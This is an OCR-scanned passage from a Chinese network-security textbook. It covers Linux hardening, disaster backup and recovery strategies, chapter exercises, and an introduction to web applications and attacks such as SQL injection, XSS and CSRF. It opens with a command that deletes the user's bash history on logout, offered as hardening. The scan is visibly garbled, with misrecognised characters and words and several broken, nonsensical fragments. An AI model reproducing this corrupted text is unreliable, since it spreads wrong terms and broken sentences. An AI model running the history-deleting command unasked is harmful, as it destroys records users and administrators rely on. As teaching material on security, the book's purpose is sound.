

rm -f S$HOME/.bash history 


该 行 表明 ， 当 用 户 每 次 注销 时 ，.bash_history 文件 会 被 删除 。 


4.4 灾难 备份 和 恢复 


网 络 安全 在 一 定 程度 上 是 为 了 保护 信息 和 数据 的 安全 ， 网 络 及 其 存储 的 数据 已 经 成 为 
人 类 最 宝贵 的 财富 ， 数 据 一 旦 丢失 将 会 造成 难以 估量 的 损失 。 保 护 信息 安全 除了 采取 各 种 
安全 措施 提高 网 络 的 安全 级 别 之 外 ， 还 要 采取 各 种 容 灾 措 施 ， 保 证 网 络 发 生 故 障 后 ， 还 能 
够 继续 提供 服务 。 
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4.4.1 灾难 备份 


灾难 备份 (有 时 可 简称 “ 灾 备 ”) 的 目的 是 确保 重要 信息 系统 的 数据 安全 和 关键 业务 可 
持续 服务 ， 提 高 系统 抵御 各 种 灾难 的 能 力 ， 减 少 灾难 造成 的 损失 。 灾 难 备份 一 般 通 过 在 异 
地 建立 和 维护 一 个 数据 备份 系统 ， 利 用 地 理 上 的 分 散 性 来 抵御 数据 灾难 性 的 事件 。 灾 难 备 
份 在 设计 时 要 考虑 很 多 因素 ， 比 如 备份 的 范围 ， 灾 难 发 生 时 系统 要 求 的 恢复 时 间 ， 系 统 能 
容忍 的 数据 丢失 量 以 及 资金 投入 量 等 。 

通常 把 灾难 备份 系统 分 为 数据 级 灾难 备份 、 应 用 级 灾难 备份 和 系统 级 灾难 备份 。 


1. 数据 级 灾难 备份 


数据 级 灾难 备份 即 数 据 备 份 ， 指 为 防止 系统 出 现 操作 失误 或 系统 故障 导致 数据 丢失 ， 
而 将 全 部 或 部 分 数据 集合 从 应 用 主机 的 硬盘 或 存储 阵列 中 复制 到 其 他 存储 介质 的 过 程 。 数 
据 级 的 灾 备 只 备份 业务 数据 ， 而 不 管 系统 数据 和 应 用 程序 数据 ， 数 据 备份 需要 采取 一 定 措 
施 保证 业务 数据 的 完整 性 、 可 靠 性 和 安全 性 。 

要 进行 数据 备份 ， 首 先 要 制定 数据 备份 的 策略 ， 包 括 备份 周期 和 备份 方式 等 。 从 备份 
的 内 容 出 发 ， 可 分 为 以 下 几 种 备份 策略 。 

1) “完全 备份 

完全 备份 是 指 按 备 份 周期 (如 一 天 ) 对 整个 系统 所 有 的 数据 进行 备份 ， 而 不 管 它 是 否 改 
变 。 这 种 备份 的 方式 操作 简单 ， 能 够 克服 数据 不 安全 的 缺点 ， 并 在 一 定 程度 上 保证 数据 的 
完整 性 。 有 了 完全 备份 ， 恢 复 起 来 也 比较 方便 ， 恢 复 操 作 可 以 一 次 性 完成 。 

完全 备份 的 不 足 之 处 是 需要 占用 的 磁盘 空间 比较 大 ， 由 于 每 次 都 要 对 所 有 数据 进行 完 
全 备份 ， 会 占用 大 量 的 磁盘 空间 ， 而 且 很 多 数据 属于 宛 余 信 息 ， 内 容 是 一 样 的 ， 比 较 浪费 
资源 。 而 且 完全 备份 需要 的 时 间 比 较 长 ， 同 时 也 比较 消耗 系统 资源 ， 因 此 ， 这 种 方式 不 适 
合 业务 繁忙 的 系统 。 

2) ” 增 量 备份 

增 量 备份 指 系 统 每 次 只 备份 上 一 次 备份 后 增加 的 或 修改 过 的 部 分 数据 ， 即 只 备份 更 新 
过 的 数据 ， 不 备份 之 前 的 数据 。 如 果 采 取 这 种 备份 方式 ， 每 一 次 的 备份 数据 都 很 重要 ， 都 
要 妥善 保存 和 管理 ， 而 且 顺 序 不 能 变 。 

增 量 备份 的 优点 是 减少 了 数据 的 元 余 ， 节 省 了 磁盘 空间 ， 缩 短 了 备份 时 间 ， 同 时 ， 减 
少 了 对 系统 资源 的 消耗 。 它 的 缺点 是 数据 的 恢复 过 程 比较 麻烦 ， 需 要 一 系列 的 文件 ， 进 行 
一 系列 的 操作 ， 也 容易 出 错 。 

3) ”差异 备份 

差异 备份 是 仅 备 份 上 一 次 完全 备份 后 修改 或 增加 的 部 分 数据 。 它 与 增 量 备份 的 区 别 
是 : 增 量 备份 针对 上 一 次 备份 ( 增 量 备份 或 完全 备份 ); 差异 备份 针对 上 一 次 完全 备份 。 如 
果 只 存在 两 个 文件 ， 那 么 差异 备份 和 增 量 备份 是 相同 的 。 

差异 备份 只 需要 两 个 文件 就 能 恢复 系统 ， 即 上 一 次 完全 备份 的 文件 和 最 新 差异 备份 文 
件 ， 它 兼 具 了 完全 备份 和 增 量 备份 的 优点 ， 可 节省 备份 的 时 间 和 磁盘 的 空间 ， 数 据 恢复 的 
过 程 也 比较 简单 ， 最 多 只 需要 两 次 备份 文件 即 可 。 
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4) ”累加 备份 

累加 备份 采用 数据 库 的 管理 方式 ， 记 录 累 积 每 个 时 间 点 的 变化 ， 并 把 变化 后 的 值 备 份 
到 相应 的 数组 中 ， 这 种 备份 方式 可 恢复 到 指定 的 时 间 点 。 

累加 备份 是 借助 计算 机 对 数据 备份 进行 管理 ， 备 份 起 来 比较 灵活 ， 恢 复 也 比较 方便 ， 
但 是 安全 性 受到 数据 库 管 理 的 制约 ， 容 易 出 错 ， 而 且 出 错 后 果 比 较 严重 。 

5) ” 按 需 备份 

除了 以 上 的 备份 策略 外 ， 在 实际 应 用 过 程 中 ， 还 有 一 种 备份 方式 比较 常用 ， 即 按 需 备 
份 。 该 方式 根据 系统 和 用 户 需求 ， 随 时 对 所 需 数据 进行 备份 ， 它 是 除 正常 备份 外 ， 额 外 进 
行 的 备份 操作 。 比 如 在 一 次 事件 中 ， 需 要 备份 很 少 的 几 个 文件 或 目录 ， 这 在 实际 工作 中 经 
常 遇 到 。 

在 数据 备份 的 实际 操作 中 ， 常 将 这 几 种 备份 策略 组 合 使 用 。 比 如 采取 完全 备份 加 增 量 
备份 的 方式 ， 可 以 选择 在 系统 和 网 络 空闲 时 (如 周 六 晚上 ) 进 行 完 全 备份 ， 然 后 在 之 后 的 几 
天 ( 周 日 到 周 五 )， 进 行 增 量 备份 。 也 可 以 选择 在 之 后 的 几 天 做 差异 备份 ， 即 完全 备份 加 差 
异 备 份 的 方式 。 另 外 ， 如 果 有 特殊 情况 ， 按 需 备份 做 额外 补充 。 

基于 磁盘 系统 的 PPRC 系统 是 典型 的 数据 级 灾难 备份 系统 。 


2. 应 用 级 灾难 备份 


应 用 级 灾难 备份 是 在 数据 级 灾难 备份 的 基础 上 ， 把 业务 应 用 处 理 能 力 再 复制 一 份 ， 也 
就 是 在 异地 灾难 备份 中 心 再 构建 一 套 支撑 系统 。 支 撑 系 统 包 括 数据 备份 系统 、 备 用 数据 处 
理 系统 、 备 用 网 络 系统 等 部 分 。 应 用 级 灾难 备份 能 提供 应 用 接管 能 力 ， 即 在 生产 中 心 发 生 
故障 的 情况 下 ， 能 够 在 灾难 备份 中 心 接管 应 用 ， 从 而 尽量 减少 系统 停机 时 间 ， 提 高 业务 连 
续 性 。 

要 进行 数据 和 应 用 的 异地 备份 ， 常 采用 负载 均衡 、 应 用 隔离 、 自 动 化 监控 等 技术 来 
实现 。 

1) ”负载 均衡 技术 

负载 均衡 (Load Balance) 建 立 在 现 有 网 络 结构 之 上 ， 它 提供 了 一 种 廉价 、 有 效 、 透 明 
的 方法 ， 来 扩展 网 络 设备 和 服务 器 的 带宽 、 增 加 吞吐 量 、 加 强 网 络 数据 处 理 能 力 、 提 高 网 
络 的 灵活 性 和 可 用 性 。 

负载 均衡 有 两 方面 的 含义 : 首先 ， 大 量 的 并 发 访问 或 数据 流量 分 担 到 多 台 节 点 设备 上 
分 别处 理 ， 减 少 用 户 等 待 响应 的 时 间 ; 其 次 ， 单 个 重负 载 的 运算 分 担 到 多 台 节 点 设备 上 做 
并 行 处 理 ， 每 个 节点 设备 处 理 结束 后 ， 将 结果 汇总 ， 返 回 给 用 户 ， 使 系统 处 理 能 力 得 到 大 
幅度 提高 。 

目前 有 许多 不 同 的 负载 均衡 技术 用 以 满足 不 同 的 应 用 需求 ， 如 软件 /硬件 负载 均衡 、 
本 地 /全 局 负载 均衡 、 更 高 网 络 层 负载 均衡 以 及 链 路 聚合 技术 。 

2) ”应 用 隔离 技术 

对 于 规模 较 大 的 网 络 ， 通 常 把 将 应 用 和 数据 按照 业务 或 地 域 进行 适当 分 割 ， 以 保护 用 
户 数据 ， 减 少 故障 的 影响 。 比 如 在 高 级 操作 系统 上 ， 按 照 不 同 的 用 户 与 程序 分 配 不 同 的 地 
址 空间 ， 每 个 应 用 程序 只 能 访问 自己 的 数据 区 ， 因 此 一 个 程序 的 异常 不 会 影响 其 他 程序 和 
用 户 。 另 外 ， 用 虚拟 机 进行 逻辑 隔离 也 是 应 用 隔离 的 典型 应 用 。 
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3) ”利用 自动 化 操作 减少 人 为 故障 

人 工 操作 系统 会 受到 心情 、 责 任 心 、 技 术 等 人 为 因素 的 影响 ， 降 低 系统 的 可 靠 性 。 自 
动 化 的 操作 方式 会 减少 人 工 操作 的 次 端 ， 缩 短 任务 执行 时 间 ， 保 证 应 用 服务 的 高 可 靠 运 
行 。 系 统 的 自动 化 是 指 信 息 和 事件 根据 资源 的 状态 转 到 自动 化 设备 ， 自 动 化 设备 根据 资源 
的 状态 进行 相应 的 处 理 。 目 前 常用 的 自动 化 操作 方式 是 心跳 检测 。 


3. 系统 级 灾难 备份 


系统 级 灾难 备份 既 要 进行 业务 数据 的 备份 ， 还 要 对 信息 系统 的 数据 库 、 系 统 数据 、 运 
行 环境 、 网 络 环境 等 进行 备份 ， 以 便 迅速 恢复 整个 系统 。 需 要 同时 保证 业务 数据 、 系 统 数 
据 和 网 络 系统 的 完整 性 、 可 靠 性 和 安全 性 。 有 了 系统 级 灾难 备份 措施 ， 在 整个 系统 失效 
时 ， 能 够 迅速 恢复 。 

实现 系统 级 灾难 备份 的 方式 有 : 宛 余 、 集 群 和 网 络 恢复 技术 。 

1) “元 余 

宛 余 又 叫 储备 ， 是 利用 系统 的 关联 模型 来 提高 系统 可 靠 性 的 一 种 手段 。 宛 余 系统 包括 
主 部 件 和 宛 余 部 件 ， 一 旦 主 部 件 发 生 故 障 ， 元 余部 件 立 即 接替 主 部 件 继续 工作 ， 避 免 
停机 。 

宛 余 包括 全 备用 元 余 和 分 担 元 余 两 种 模式 。 全 备用 宛 余 指正 常 工 作 时 ， 主 部 件 处 于 激 
活 状态 ， 宛 余部 件 处 于 备用 状态 ， 不 参与 任何 工作 。 分 担 元 余 是 指 主 部 件 和 元 余部 件 一 起 
分 担任 务 ， 一 个 发 生 故 障 ， 则 由 另 一 个 全 部 接管 所 有 工作 。 

元 余 主 要 针对 易 失 效 的 关键 部 件 ， 计 算 机 常用 的 部 件 元 余 有 : 

@ ”磁盘 系统 见 余 。 磁 盘 阵 列 (RAID) 是 磁盘 系统 元 余 的 典型 应 用 ， 有 效 数据 和 校 验 数 

据 均 匀 分 布 在 多 个 硬盘 中 ， 一 块 硬盘 的 损坏 不 影响 有 效 数据 的 完整 性 。 

@ 电源 系统 元 余 。 采 用 N+1 热 插 拔 电源 ， 某 个 电源 发 生 故 障 不 影响 系统 正常 

运行 。 

@ 网络 系 统 元 余 。 自 动 控制 元 余 网 卡 ， 系 统 正常 工作 是 分 担 网 络 流量 ， 一 块 网 卡 出 

现 故 障 ， 自 动 切换 到 其 他 网 卡 。 
@ 。 双 机 热 备 系统 。 系 统 包 括 主 主 机 和 备用 主机 ， 可 同时 工作 ， 也 可 一 个 工作 ， 一 个 
处 于 备用 状态 ， 一 旦 一 台 主机 发 生 故 障 ， 自 动 切换 到 另 一 台 。 

2) ”集群 

集群 是 由 一 些 相 互 连 接 在 一 起 的 计算 机 构成 的 并 行 或 分 布 式 系统 。 这 些 计 算 机 并 行 计 
算 从 而 获得 很 高 的 计算 速度 ， 也 可 用 多 个 计算 机 做 备份 。 其 中 任何 一 台 机 器 出 现 故 障 ， 不 
影响 整个 系统 的 正常 运行 。 集 群 服务 在 客户 端 看 来 就 像 是 一 直 有 个 服务 器 在 工作 ， 而 对 内 
来 说 ， 集 群 内 的 计算 机 通过 集群 软件 相连 接 。 正 常 工作 时 ， 计 算 机 间 不 断 发 送信 号 ， 外 面 
来 的 负载 通过 一 定 的 机 制 动 态 地 分 配 到 这 些 节点 机 中 去 ， 从 而 达到 超级 服务 器 才 有 的 高 性 
能 、 高 可 用 的 要 求 。 当 某 服务 器 出 现 故 障 ， 其 他 服务 器 接收 不 到 其 发 出 的 信号 时 ， 集 群 软 
件 的 切换 功能 会 发 生 作 用 ， 故 障 服务 器 的 工作 被 其 他 指定 服务 器 接管 ， 从 而 保证 服务 器 的 
不 间断 运行 。 

3) ”网 络 恢复 技术 

常用 的 网 络 恢复 技术 包括 : 链 路 层 网 络 恢复 、 交 换 层 网 络 恢复 和 路 由 层 网 络 恢复 。 链 
路 层 网 络 恢复 可 以 通过 链 路 备份 和 实现 转换 ， 交 换 层 网 络 恢复 需要 动态 网 络 路 由 重 选 ， 来 
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保证 应 用 能 够 在 不 中 断 最 终 用 户 的 情况 下 转 入 备用 数据 中 心 ; 路 由 层 网 络 恢复 可 以 通过 
APPN 或 标准 的 路 由 协议 来 完成 。 

目前 存在 的 备份 技术 有 : 虚拟 存储 、 数 据 迁 移 、LAN free、IP 存储 、 光 纤 存 储 等 新 
技术 。 


4.4.2 ”灾难 恢复 


灾难 恢复 措施 在 整个 信息 安全 保护 中 占有 相当 重要 的 位 置 ， 因 为 它 关 系 到 系统 在 经 历 
灾难 后 能 否 迅速 恢复 运行 。 

灾难 恢复 工作 ， 包 括 灾难 恢复 规划 和 灾难 备份 中 心 的 日 常 运行 、 关 键 业 务 功能 在 灾难 
备份 中 心 的 恢复 和 重 续 运行 ， 以 及 主 系统 的 灾后 重建 和 回 退 工作 ， 还 涉及 突 发 事件 发 生 后 
的 应 急 响应 。 


1. 灾难 恢复 的 过 程 


灾难 恢复 规划 是 一 个 周而复始 、 持 续 改进 的 过 程 ， 包 含 4 个 阶段 : 灾难 恢复 需求 的 确 
定 、 灾 难 恢复 策略 的 制定 、 灾 难 恢 复 策 略 的 实现 、 灾 难 恢 复 预 案 实 现 。 

1) “灾难 恢复 需求 的 确定 

首先 应 该 进行 风险 分 析 和 灾难 发 生 对 业务 影响 的 分 析 ， 了 解 相 关 业 务 功能 之 间 的 相关 
性 ， 对 业务 中 断 进行 定量 或 定性 的 评估 。 既 要 考虑 直接 或 间接 的 经 济 损失 ， 也 要 考虑 组 织 
声誉 、 顾 客 忠 诚 度 、 社 会 影响 等 非 经 济 损失 。 然 后 根据 风险 和 业务 影响 分 析 的 结果 ， 确 定 
灾难 恢复 的 目标 ， 包 括 要 恢复 的 关键 业务 的 功能 及 恢复 的 优先 顺序 ， 灾 难 恢复 的 时 间 范 
围 。 灾 难 恢复 的 时 间 范 围 包括 恢复 时 间 目 标 (RTO， 信 息 系统 或 业务 功能 从 停顿 到 必须 恢 
复 的 时 间 要 求 )、 恢 复 点 目标 (RPO， 系 统 和 数据 必须 恢复 到 的 时 间 点 要 求 )。 

2) ”灾难 恢复 策略 的 制定 

根据 灾难 恢复 目标 ， 按 照 灾 难 恢复 资源 的 成 本 与 风险 可 能 造成 的 损失 之 间 取 得 平衡 的 
原则 ， 确 定 每 项 关键 业务 功能 的 灾难 恢复 策略 ， 不 同 的 业务 功能 可 采用 不 同 的 灾难 恢复 策 
略 。 灾 难 恢复 策略 主要 包括 : 灾难 恢复 资源 的 获取 方式 、 灾 难 恢复 能 力 等 级 或 灾难 恢复 资 
源 各 要 素 的 具体 要 求 。 灾 难 恢复 资源 主要 来 源 于 之 前 的 灾难 备份 ， 如 数据 备份 、 业 务 应 用 
的 备份 、 系 统 备份 、 网 络 系统 及 各 种 硬件 设施 的 备份 等 。 

3) ”灾难 恢复 策略 的 实现 

根据 灾难 恢复 策略 制定 相应 的 灾难 备份 系统 技术 方案 ， 为 确保 技术 方案 满足 灾难 恢复 
策略 的 要 求 ， 应 由 相关 部 门 的 技术 人 员 对 方案 进行 确认 和 验证 ， 并 记录 和 保存 其 结果 。 对 
技术 方案 制订 测试 计划 ， 并 组 织 最 终 用 户 共 同 进 行 测试 ， 确 认 能 够 实现 如 下 功能 : 

e ”数据 恢复 功能 ; 

e@ 在 限定 的 时 间 内 ， 利 用 备份 数据 正确 恢复 系统 、 应 用 软件 及 各 类 数据 ， 并 可 正确 

恢复 各 项 关键 业务 功能 ; 

e 客户 端 可 与 备用 数据 处 理 系统 通信 正常 。 

为 达到 灾难 恢复 的 目标 ， 灾 难 备份 中 心 应 保证 备份 的 及 时 性 和 有 效 性 以 及 灾难 来 临时 
有 效 的 应 急 响 应 和 处 理 能 力 。 
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4) ”灾难 恢复 预案 的 实现 

灾难 恢复 预案 的 制定 应 遵循 完整 性 、 易 用 性 、 明 确 性 、 有 效 性 和 兼容 性 原则 ， 且 应 经 
过 起 草 、 评 审 、 测 试 、 完 善 、 审 核 和 批准 的 过 程 。 灾 难 恢复 预案 应 定期 进行 演练 ， 演 练 的 
整个 过 程 应 有 详细 的 记录 ， 并 形成 报告 ， 如 果 与 预期 不 符 ， 应 及 时 对 预案 进行 相应 的 修 
改 。 另 外 ， 预 案 也 应 根据 业务 流程 和 信息 系统 的 变换 ， 及 时 变更 。 预 案 应 具备 严格 的 管理 
制度 ， 如 专人 负责 、 多 份 拷贝 、 统 一 更 新 等 。 


4.5 本 章 小 结 


本 章 通过 大 量 的 实例 介绍 了 与 操作 系统 安全 有 关 的 相关 知识 。 首 先 介 绍 了 操作 系统 安 
全 的 概念 、 安 全 要 求 和 安全 机 制 。 讲 述 了 Windows 7 操作 系统 的 安全 机 制 ， 重 点 介绍 了 
Windows 7 操作 系统 的 安全 配置 ， 读 者 可 以 通过 这 些 配置 加 强 计算 机 的 安全 性 。 接 着 介绍 
了 Unix/Linux 系统 的 安全 性 ， 从 系统 的 安装 到 日 常 维护 ， 列 出 了 能 够 增强 操作 系统 安全 
的 配置 选项 。 最 后 简要 介绍 了 系统 的 灾难 备份 和 恢复 。 


4.6 课 后 习题 


1. 填空 题 


(1) 安全 操作 系统 的 设计 有 两 种 方式 ， 一 种 是 就 充分 考虑 系统 的 安全 
性 ; 另 一 种 是 基于 一 个 通用 的 操作 系统 ， 专 站 ， 并 通过 相应 的 
安全 性 评测 。 

(2) 访问 控制 是 指 实施 的 用 户 访问 控制 ， 细 化 访问 权限 等 。 

(3) 为 满足 操作 系统 的 安全 性 要 求 ， 所 采用 的 安全 措施 和 机 制 主要 有 、 访 
间 控 制 和 ， . 

(4) 在 Unix/Linux 系统 中 ， 代 表 文件 权限 的 第 一 个 入 进 制 数 分 别 代表 
SGID 位 和 


2. 选择 题 
(1) 在 Windows 7 中， 可 以 利用 (  ) 功 能 加 密 磁盘 和 磁盘 中 的 数据 。 
A. SuteB B. BitLocker 
C. Biometric Framework D. Applocker 
(2) 为 阻止 一 个 特定 的 用 户 登 录 系统 ，Linux 可 以 使 用 的 命令 解释 程序 有 ( ” )。 
A. /dev/null B. /bin/bash 
C. /sbin/nologin D. /sbin/sh 
3. 判断 题 
(1) 在 Windows 7 中 ，Bitlocker 可 以 对 移动 磁盘 进行 加 密 。 (， 


(2) DirectAccess 在 Windows 7 中 的 功能 等 同 于 VPN. ( ) 
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(3) Windows 7 的 安全 性 是 从 系统 架构 出 发 ， 从 底层 设计 开始 就 将 安全 考虑 进去 。 
¢ 
4. 简 答题 


(1) 什么 是 安全 操作 系统 ? 

(2) Windows 7 操作 系统 的 安全 性 主要 表现 在 哪些 方面 ? 

(3) 在 标准 Unix/Linux 系统 中 ， 操 作 系统 维护 哪些 日 志 ， 记 录 哪 些 信 息 ? 
(4) 什么 是 数据 级 灾难 备份 ” 有 几 种 备份 策略 ? 

(5) 灾难 恢复 一 般 要 经 历 哪 些 步骤 ? 


5. 操作 题 


(1) 打开 Windows 防火 墙 ， 进 行 如 下 设置 : 

还 原 默 认 设 置 ; 

阻止 所 有 主机 对 本 机 TCP 135 和 UDP 135 端口 的 连接 ; 
阻止 所 有 主机 对 本 机 TCP 22 端口 的 连接 ; 

允许 用 户 局 域 网 内 某 台 主机 对 本 机 TCP 22 端口 的 连接 。 
(2) 配置 Linux 服务 器 安全 ， 要 求 如 下 : 

设置 系统 启动 时 要 求 密码 验证 ; 

查看 /etc/passwd, 注 释 掉 暂时 不 用 的 用 户 ; 

如 果 用 户 登 录 系 统一 小 时 内 无 动作 ， 则 自动 注销 ; 

关闭 系统 的 telnet、exec、rpc、ftp 和 finger 服务 ; 
禁止 用 户 通 过 root 身份 远程 ssh 登录 系统 ; 

用 户 注销 时 ， 删 除 其 历史 命令 。 


Web 服务 是 一 种 很 有 前 途 的 解决 方案 ， 它 可 以 实现 客户 和 企业 
之 间 快 速 而 灵活 的 信息 共享 。Web 服务 能 够 访问 那些 以 前 被 锁定 在 
公司 网 络 内 部 并 且 只 能 通过 专用 软件 来 访问 的 数据 。 

正 因为 网 络 Web 服务 应 用 的 如 此 广泛 ， 又 在 生活 中 扮演 着 重要 
的 角色 ，Web 服务 在 为 我 们 带 来 好 处 的 同时 也 引发 了 一 个 严重 的 风 
险 : 敏感 的 、 保密 的 数据 可 能 会 注 委 给 剖 a 灶 


其 安全 性 是 不 容 忽 视 的 ， 它 是 网 络 能 否 经 历 考 
性 不 好 会 给 人 们 带 来 很 多 麻烦 。Web 信息 交流 已 
少 的 一 个 环节 ， 然 而 最 初 Web 信息 安全 却 得 不 到 相应 各 
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5.1 Web 安全 基础 


5.1.1 Web 应 用 的 基础 概念 


在 讨论 Web 应 用 安全 之 前 ， 先 简单 介绍 一 下 Web 应 用 基础 概念 ， 这 样 便于 理解 为 
什么 Web 应 用 是 脆弱 的 ， 容 易 受 到 攻击 。 


1. 什么 是 Web 应 用 


Web 应 用 是 由 动态 脚本 、 编 译 过 的 代码 等 组 合 而 成 。 它 通常 架设 在 网 络 服务 机 群 
DMZ 区 的 Web 服务 器 上 ， 用 户 使 用 通用 的 Web 浏览 器 ， 通 过 接 入 网 络 连 接 到 Web 服务 
器 。 用 户 发 出 请 求 ， 服 务 器 根据 请 求 的 URL 的 地 址 连接 ， 找 到 对 应 的 网 页 文件 ， 发 送 给 
用 户 ， 两 者 对 话 的 “官方 语言 ”是 http 协议 。 网 页 文件 是 用 文本 描述 的 ，HTML/XML 格 
式 ， 在 用 户 浏览 器 中 有 个 解释 器 ， 把 这 些 文本 描述 的 页 面 恢复 成 图 文 并 茂 、 有 声 有 影 的 可 
视 页 面 。 


2. Web 访问 和 Web 页 发 展 


通常 情况 下 ， 用 户 要 访问 的 页 面 都 在 Web 服务 器 的 某 个 固定 目录 下 ， 是 一 些 .html 
或 .xml 文件， 用户 通过 页 面 上 的 “ 超 链 接 ”。 在 网 站 页 面 之 间 “ 跳 跃 ”， 这 就 是 静态 的 网 
页 。 后 来 人 们 觉得 这 种 方式 只 单 向 地 为 用 户 展示 信息 、 信 息 发 布 还 可 以 ， 但 让 用 户 做 一 些 
比如 身份 认证 、 投 票选 举 之 类 的 事情 就 比较 麻烦 ， 由 此 产生 了 动态 网 页 的 概念 。 所 谓 动态 
就 是 利用 Flash、PHP、ASP、Java 等 技术 在 网 页 中 嵌入 一 些 可 运行 的 程序 ， 用 户 浏览 器 在 
解释 页 面 时 看 到 这 些 程序 就 启动 运行 它 。 程 序 的 用 法 很 灵活 ， 可 以 展示 一 段 动画 (如 
Flash)， 也 可 以 在 你 的 PC 上 生成 一 个 文件 ， 或 者 接收 输入 的 一 段 信息 。 这 样 就 可 以 根据 
用 户 的 “想法 ”， 即 有 效 操作 ， 对 页 面 进行 定制 处 理 。 让 用 户 访问 时 ， 看 到 的 是 上 次 设计 
好 的 特有 风格 。 典 型 的 例子 就 是 QQ 空间 、 百 度 空间 和 一 些 支持 客户 自 定义 CSS 和 框架 
样式 的 网 站 。“ 贵 宾 的 感觉 ”是 每 个 人 都 喜欢 的 ， 更 何况 是 在 虚拟 的 网 络 世界 中 。 

动态 Web 页 面 的 使 用 让 Web 服务 模式 有 了 “双向 交流 ”的 能 力 ，Web 服务 模式 也 可 
以 像 传统 软件 一 样 进行 各 种 事务 处 理 ， 如 编辑 文件 、 利 息 计算 、 提 交 表格 等 ，Web 架构 的 
适用 面 大 大 扩展 ， 之 所 以 Web 2.0 可 以 成 为 SOA 架构 的 实现 技术 之 一 ， 这 些 动态 页 面 程 
序 是 功 不 可 没 的 。 

这 些 程序 可 以 嵌入 在 页 面 中 ， 也 可 以 以 文件 的 形式 单独 存放 在 Web 服务 器 的 目录 
里 ， 如 asp、php、jsp 文件 等 。 可 以 在 开发 时 指定 它们 是 在 用 户 端 运行 ， 还 是 在 服务 器 端 
运行 。 大 多 数 程序 启用 了 在 服务 器 端 运行 ， 所 以 用 户 不 能 看 到 这 些 程序 的 源 代码 ， 服 务 的 
安全 性 也 大 大 提高 。 这 样 功能 性 的 程序 越 来 越 多 ， 形 成 常用 的 工具 包 ， 可 以 单独 管理 。 
Web 业务 开发 时 ， 直 接 使 用 就 可 以 了 ， 它 们 实际 上 是 Web 服务 器 处 理 能 力 的 扩展 。 

静态 网 页 与 小 程序 都 是 事先 设计 好 的 ， 一 般 不 经 常 改动 。 但 网 站 上 很 多 内 容 需 要 经 常 
更 新 ， 如 新 闻 、 博 客 文章 、 互 动 游戏 等 ， 这 些 变动 的 数据 放 在 静态 的 程序 中 显然 不 适合 ， 
传统 的 办 法 是 数据 与 程序 分 离 ， 采 用 专业 的 数据 库 。Web 开发 者 在 Web 服务 器 后 边 增 加 
了 一 个 数据 库 服务 器 ， 这 些 经 常 变 化 的 数据 存 进 数据 库 ， 可 以 随时 更 新 。 当 用 户 请 求 页 面 
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时 ,根据 用 户 要 求 的 页 面 ， 涉 及 动态 数据 的 地 方 ， 利 用 SQL 数据 库 或 者 其 他 数据 库 语 
言 ， 从 数据 中 读 取 最 新 的 数据 ， 生 成 “完整 ”页 面 ， 最 后 送 给 用 户 ， 如 股市 行情 曲线 ， 就 
是 由 不 断 刷新 的 程序 控制 。 


3. Web 攻击 的 发 展 


Web 攻击 发 展 也 可 以 分 为 几 个 阶段 。 在 Web 1.0 时 代 ， 人 们 更 多 的 关注 服务 器 端 动态 
脚本 的 安全 问题 ， 比 如 将 一 个 可 执行 脚本 (俗称 WebshelD) 上 传 到 服务 器 上 ， 从 而 获得 权 
限 。 动 态 脚本 语言 的 普及 ， 以 及 Web 技术 发 展 初期 对 安全 问题 认 知 的 不 足 导致 很 多 “ 血 
案 ” 的 发 生 ， 同 时 也 遗留 下 很 多 问题 。 比 如 曾经 风靡 一 时 的 PHP 至 今 仍然 只 能 靠 较 好 的 
代码 规范 来 保证 没有 文件 包含 漏洞 ， 而 无 法 在 语言 本 身上 杜绝 安全 问题 的 发 生 。 

后 来 发 展 到 了 SQL 的 注入 ， 这 可 以 说 是 Web 安全 历史 上 的 一 个 里 程 碑 ， 最 早出 现在 
1999 年 ， 当 时 发 展 事态 很 快 成 为 了 Web 安全 攻击 的 最 热门 手段 。 当 时 黑客 们 的 发 现 可 以 
通过 SQL 注入 得 到 很 多 敏感 重要 的 数据 信息 ， 有 些 甚 至 获得 了 服务 器 系统 权限 。 发 展 至 
今 SQL 注入 仍然 是 一 个 Web 安全 重要 威胁 。 

相继 之 后 出 现 了 XSS( 跨 站 脚本 攻击 )。 事 实 上 XSS 的 出 现 几乎 和 SQL 注入 是 同时 期 
的 ， 但 是 当时 黑客 和 安全 领域 更 多 的 关注 与 SQL 注入 入 侵 。 而 跨 站 脚本 攻击 真正 发 展 为 
热门 是 在 2003 年 之 后 的 。 著 名 的 Myspace 的 XSS 蠕虫 事件 致使 安全 界 对 XSS 重视 了 
很 多 。 

到 了 Web 2.0 的 问世 和 兴起 ，XSS 和 CSRF 攻击 已 经 变 得 更 为 强大 。 攻 击 的 形式 也 不 
仅 限于 服务 器 服务 端 ， 黑 客 们 的 目光 开始 更 多 关注 于 客户 端的 浏览 器 和 用 户 入 侵 。 比 如 出 
现 了 跨 站 点 请 求 伪 造 (CSRF)、 点 击 劫持 (ClickJacking)。 

Web 发 展 到 今天 构建 了 丰富 多 彩 的 互联 网 。 互 联网 业务 的 蓬勃 发 展 ， 催 生 了 许多 新 兴 
的 脚本 语言 ， 比 如 Pyphon、Ruby、NodeJS 等 ， 致 使 Web 安全 技术 的 发 展 也 紧 跟 互联 网 
发 展 的 脚步 ， 不 断 地 演化 出 新 的 变化 。 


4. Cookies 和 Session 的 产生 


Cookies: 是 一 种 能 够 让 网 站 服务 器 把 少量 数据 储存 到 客户 端的 硬盘 或 内 存 ， 或 是 从 
客户 端的 硬盘 读 取 数据 的 一 种 技术 。Cookies 是 当 你 浏览 某 网 站 时 ， 由 Web 服务 器 置 于 你 
硬盘 上 的 一 个 非常 小 的 文本 文件 ， 它 可 以 记录 你 的 用 户 人 D、 密 码 、 浏 览 过 的 网 页 、 停 留 
的 时 间 等 信息 。 当 你 再 次 来 到 该 网 站 时 ， 网 站 通过 读 取 Cookies， 得 知 你 的 相关 信息 ， 就 
可 以 做 出 相应 的 动作 ， 如 在 页 面 显 示 欢 迎 你 的 标语 ， 或 者 让 你 不 用 输入 ID 和 密码 就 可 以 
直接 登录 等 。 

Session: 是 指 一 个 终端 用 户 与 交互 系统 进行 通信 的 时 间 间 隔 ， 通 常 指 从 注册 进入 系统 
到 注销 退出 系统 之 间 所 经 过 的 时 间 。 具 体 到 Web 中 的 Session 指 的 就 是 用 户 在 浏览 某 个 网 
站 时 ， 从 进入 网 站 到 浏览 器 关闭 所 经 过 的 这 段 时 间 ， 也 就 是 用 户 浏览 这 个 网 站 所 花费 的 
时 间 。 

从 上 述 的 定义 中 我 们 可 以 看 到 ，Session 实际 上 是 一 个 特定 的 时 间 概 念 。 也 就 是 当 一 
个 访问 者 来 到 你 的 网 站 的 时 候 一 个 Session 就 开始 了 ， 当 他 离开 的 时 候 Session 就 结束 了 。 
